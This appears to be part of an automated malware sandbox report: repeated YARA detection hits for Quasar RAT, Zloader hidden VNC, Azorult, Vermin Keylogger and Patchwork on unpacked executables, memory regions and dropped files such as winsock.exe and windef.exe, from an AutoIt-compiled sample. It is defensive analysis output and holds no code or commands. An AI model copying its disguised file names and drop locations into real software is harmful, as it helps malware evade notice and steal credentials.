Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED Matched rule: Detects Patchwork malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED Matched rule: Detects QuasarRAT malware Author: Florian Roth
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: This is a third-party compiled AutoIt script. 1_2_00DB3B3A
Source: CVbJSUXraQ.exe String found in binary or memory: This is a third-party compiled AutoIt script.
